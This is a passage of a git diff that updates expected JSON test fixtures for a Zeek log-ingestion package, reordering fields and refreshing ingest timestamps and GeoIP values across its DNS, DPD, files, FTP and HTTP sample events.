"protocol": "dns", - "community_id": "1:QIR5YXlirWwWA18ZyY/RnvQoaic=", - "transport": "udp" - }, - "@timestamp": "2019-08-29T16:23:50.734Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.86.237", - "224.0.0.251" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483491400Z", + "ingested": "2021-12-14T14:59:10.859214676Z", "original": "{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -259,9 +251,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:QIR5YXlirWwWA18ZyY/RnvQoaic=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T11:59:52.091Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "169.254.169.254" + ] + }, "destination": { "port": 53, "address": "169.254.169.254", @@ -327,26 +337,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:Mj0uP/7Ctd+meHQL8iXVrCNL2ZE=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T11:59:52.091Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "169.254.169.254" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483496800Z", + "ingested": "2021-12-14T14:59:10.859215061Z", "original": "{\"ts\":1617105592.091052,\"uid\":\"CpwXdW4LQaJkaIgpk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":33438,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58036,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"89.160.20.156\"],\"TTLs\":[13.0,18.0,8.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -360,9 +352,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:Mj0uP/7Ctd+meHQL8iXVrCNL2ZE=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T11:59:52.973Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "169.254.169.254" + ] + }, "destination": { "port": 53, "address": "169.254.169.254", @@ -426,26 +436,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:0B1VNLwfmVgcZUY1gi6ZVuS8YZE=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T11:59:52.973Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "169.254.169.254" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483502200Z", + "ingested": "2021-12-14T14:59:10.859215457Z", "original": "{\"ts\":1617105592.973919,\"uid\":\"CO5TE748RoJEZuOThl\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60444,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":35744,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.akadns.net\"],\"TTLs\":[296.0,287.0,287.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -459,9 +451,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:0B1VNLwfmVgcZUY1gi6ZVuS8YZE=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T11:59:52.974Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "169.254.169.254" + ] + }, "destination": { "port": 53, "address": "169.254.169.254", @@ -582,26 +592,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:6FS8lMU9Y2cS38F7kmqpZmgcpbs=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T11:59:52.974Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "169.254.169.254" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483507600Z", + "ingested": "2021-12-14T14:59:10.859215827Z", "original": "{\"ts\":1617105592.9742,\"uid\":\"CG1jsmeHcBCGnWXmk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44310,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58458,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.trafficmanager.net\",\"89.160.20.156\",\"40.126.31.143\",\"89.160.20.156\",\"40.126.31.1\",\"89.160.20.156\",\"40.126.31.135\",\"40.126.31.6\",\"89.160.20.156\"],\"TTLs\":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -615,9 +607,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:6FS8lMU9Y2cS38F7kmqpZmgcpbs=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T11:59:53.106Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "169.254.169.254" + ] + }, "destination": { "port": 53, "address": "169.254.169.254", @@ -683,26 +693,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:o8PIGtc58C2kli9WTnYzRHbKTwM=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T11:59:53.106Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "169.254.169.254" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483513Z", + "ingested": "2021-12-14T14:59:10.859216210Z", "original": "{\"ts\":1617105593.106256,\"uid\":\"ChP0cl4j5mbXSZ9TGf\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":36364,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":8791,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"89.160.20.156\"],\"TTLs\":[12.0,17.0,7.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -716,6 +708,14 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:o8PIGtc58C2kli9WTnYzRHbKTwM=", + "transport": "udp" } }, { @@ -791,7 +791,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:50:59.483518400Z", + "ingested": "2021-12-14T14:59:10.859216590Z", "original": "{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json b/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json index 7471188fd29..9d1a920148f 100644 --- a/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json +++ b/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json @@ -29,7 +29,7 @@ "ip": "192.168.10.31" }, "event": { - "ingested": "2021-12-09T13:51:00.428784900Z", + "ingested": "2021-12-14T14:59:11.927513731Z", "original": "{\"ts\":1507567500.423033,\"uid\":\"CRrT7S1ccw9H6hzCR\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49285,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":445,\"proto\":\"tcp\",\"analyzer\":\"DCE_RPC\",\"failure_reason\":\"Binpac exception: binpac exception: \\u0026enforce violation : DCE_RPC_Header:rpc_vers\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -94,7 +94,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:00.428792700Z", + "ingested": "2021-12-14T14:59:11.927516102Z", "original": "{\"ts\":1507567500.423033,\"uid\":\"CRrT7S1ccw9H6hzCR\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49285,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":445,\"proto\":\"tcp\",\"analyzer\":\"DCE_RPC\",\"failure_reason\":\"Binpac exception: binpac exception: \\u0026enforce violation : DCE_RPC_Header:rpc_vers\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json index f431a34ebaa..2bcdbe5a824 100644 --- a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json +++ b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json @@ -57,7 +57,7 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-12-09T13:51:00.753332400Z", + "ingested": "2021-12-14T14:59:12.263556496Z", "original": "{\"ts\":1547688796.636812,\"fuid\":\"FMkioa222mEuM2RuQ9\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C8I0zn3r9EPbfLgta6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":947,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"79e4a9840d7d3a96d7c04fe2434c892e\",\"sha1\":\"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -130,7 +130,7 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-12-09T13:51:00.753340900Z", + "ingested": "2021-12-14T14:59:12.263559362Z", "original": "{\"ts\":1547688801.566262,\"fuid\":\"FShtIS1gydeSFf8M63\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":2089,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"b9742f12eb97eff531d94f7800c6706c\",\"sha1\":\"b88d13fe319d342e7a808ce3a0a1158111fc3c2a\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -203,7 +203,7 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-12-09T13:51:00.753346700Z", + "ingested": "2021-12-14T14:59:12.263559844Z", "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -280,7 +280,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753352300Z", + "ingested": "2021-12-14T14:59:12.263560228Z", "original": "{\"ts\":1617069763.671838,\"fuid\":\"Fe722V1qt2DSlqCiOa\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"ClG5ErV7bkgKgOaV\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -357,7 +357,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753359800Z", + "ingested": "2021-12-14T14:59:12.263560605Z", "original": "{\"ts\":1617069773.678327,\"fuid\":\"FYszs61e8hIUWMWgL5\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CaB3fq3yLrKCbYLqr4\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -434,7 +434,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753365500Z", + "ingested": "2021-12-14T14:59:12.263560984Z", "original": "{\"ts\":1617069783.678588,\"fuid\":\"FdGWZq2wRIvCfjvdI5\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vhl91PPOI7LbrPZ8\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -507,7 +507,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753370900Z", + "ingested": "2021-12-14T14:59:12.263561363Z", "original": "{\"ts\":1617069792.519193,\"fuid\":\"FSMkdM3YUSoEVpLZN4\",\"tx_hosts\":[\"169.254.169.254\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CgbPEj2jf5Ca7Lw0x2\"],\"source\":\"HTTP\",\"depth\":0,\"analyzers\":[\"SHA1\",\"MD5\"],\"mime_type\":\"text/html\",\"duration\":0.00005316734313964844,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1609,\"total_bytes\":1609,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"1ab1d3a926a99ccfc25acccc5b4289b4\",\"sha1\":\"1895628784b47ad8da112c699a1b21f5b49c2b80\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -584,7 +584,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753376300Z", + "ingested": "2021-12-14T14:59:12.263561761Z", "original": "{\"ts\":1617069793.669729,\"fuid\":\"F1msmE2xRFsdvL2iI\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vua63rzjtLaiefyj\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -668,7 +668,7 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-12-09T13:51:00.753381700Z", + "ingested": "2021-12-14T14:59:12.263562136Z", "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json b/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json index 80ed77ec353..f9a86998070 100644 --- a/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json +++ b/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json @@ -1,6 +1,19 @@ { "expected": [ { + "@timestamp": "2007-08-17T19:31:44.955Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "ftp" + ], + "ip": [ + "192.168.1.182", + "192.168.1.231" + ] + }, "destination": { "port": 21, "address": "192.168.1.231", @@ -29,29 +42,8 @@ "address": "192.168.1.182", "ip": "192.168.1.182" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "ftp", - "community_id": "1:Szmpl33Czo3dQvU2V4/SrHfmBC0=", - "transport": "tcp" - }, - "@timestamp": "2007-08-17T19:31:44.955Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "ftp" - ], - "ip": [ - "192.168.1.182", - "192.168.1.231" - ] - }, "event": { - "ingested": "2021-12-09T13:51:01.440342Z", + "ingested": "2021-12-14T14:59:12.935449967Z", "original": "{\"ts\":1187379104.955342,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"EPSV\",\"reply_code\":229,\"reply_msg\":\"Entering Extended Passive Mode (|||37100|)\",\"data_channel.passive\":true,\"data_channel.orig_h\":\"192.168.1.182\",\"data_channel.resp_h\":\"192.168.1.231\",\"data_channel.resp_p\":37100}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -68,6 +60,14 @@ }, "user": { "name": "ftp" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "ftp", + "community_id": "1:Szmpl33Czo3dQvU2V4/SrHfmBC0=", + "transport": "tcp" } }, { @@ -119,7 +119,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:51:01.440350900Z", + "ingested": "2021-12-14T14:59:12.935452973Z", "original": "{\"ts\":1187379105.01948,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"RETR\",\"arg\":\"ftp://192.168.1.231/resume.doc\",\"file_size\":39424,\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -139,6 +139,19 @@ } }, { + "@timestamp": "2007-08-17T19:31:57.579Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "ftp" + ], + "ip": [ + "192.168.1.182", + "192.168.1.231" + ] + }, "destination": { "port": 21, "address": "192.168.1.231", @@ -162,29 +175,8 @@ "address": "192.168.1.182", "ip": "192.168.1.182" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "ftp", - "community_id": "1:Szmpl33Czo3dQvU2V4/SrHfmBC0=", - "transport": "tcp" - }, - "@timestamp": "2007-08-17T19:31:57.579Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "ftp" - ], - "ip": [ - "192.168.1.182", - "192.168.1.231" - ] - }, "event": { - "ingested": "2021-12-09T13:51:01.440355400Z", + "ingested": "2021-12-14T14:59:12.935453444Z", "original": "{\"ts\":1187379117.579203,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"STOR\",\"arg\":\"ftp://192.168.1.231/uploads/README\",\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -201,6 +193,14 @@ }, "user": { "name": "ftp" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "ftp", + "community_id": "1:Szmpl33Czo3dQvU2V4/SrHfmBC0=", + "transport": "tcp" } }, { @@ -257,7 +257,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:01.440358800Z", + "ingested": "2021-12-14T14:59:12.935453827Z", "original": "{\"ts\":1187379117.579203,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"STOR\",\"arg\":\"ftp://192.168.1.231/uploads/README\",\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json index 9a21b7521e5..f567a49723a 100644 --- a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json +++ b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json @@ -4,14 +4,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -85,7 +85,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:01.993412400Z", + "ingested": "2021-12-14T14:59:13.505264792Z", "original": "{\"ts\":1547687130.172944,\"uid\":\"CCNp8v1SNzY7v9d1Ih\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":62995,\"id.resp_h\":\"89.160.20.156\",\"username\":\"user\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"ocsp.apple.com\",\"uri\":\"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=\",\"version\":\"1.1\",\"user_agent\":\"com.apple.trustd/2.0\",\"request_body_len\":0,\"response_body_len\":3735,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F5zuip1tSwASjNAHy7\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -117,14 +117,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -194,7 +194,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:01.993421500Z", + "ingested": "2021-12-14T14:59:13.505267594Z", "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -221,17 +221,27 @@ } }, { + "@timestamp": "2021-03-30T05:15:54.277Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -258,28 +268,6 @@ }, "session_id": "CdqHhA1AsxBIjmVZ9" }, - "source": { - "port": 57896, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Va3F0U8tWSumaLfdIthiogJqVoM=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:15:54.277Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -294,8 +282,13 @@ "status_code": 200 } }, + "source": { + "port": 57896, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993427600Z", + "ingested": "2021-12-14T14:59:13.505268156Z", "original": "{\"ts\":1617081354.277591,\"uid\":\"CdqHhA1AsxBIjmVZ9\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":57896,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FM01o54RU9pez8AJba\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -310,20 +303,37 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Va3F0U8tWSumaLfdIthiogJqVoM=", + "transport": "tcp" } }, { + "@timestamp": "2021-03-30T05:15:55.599Z", + "ecs": { + "version": 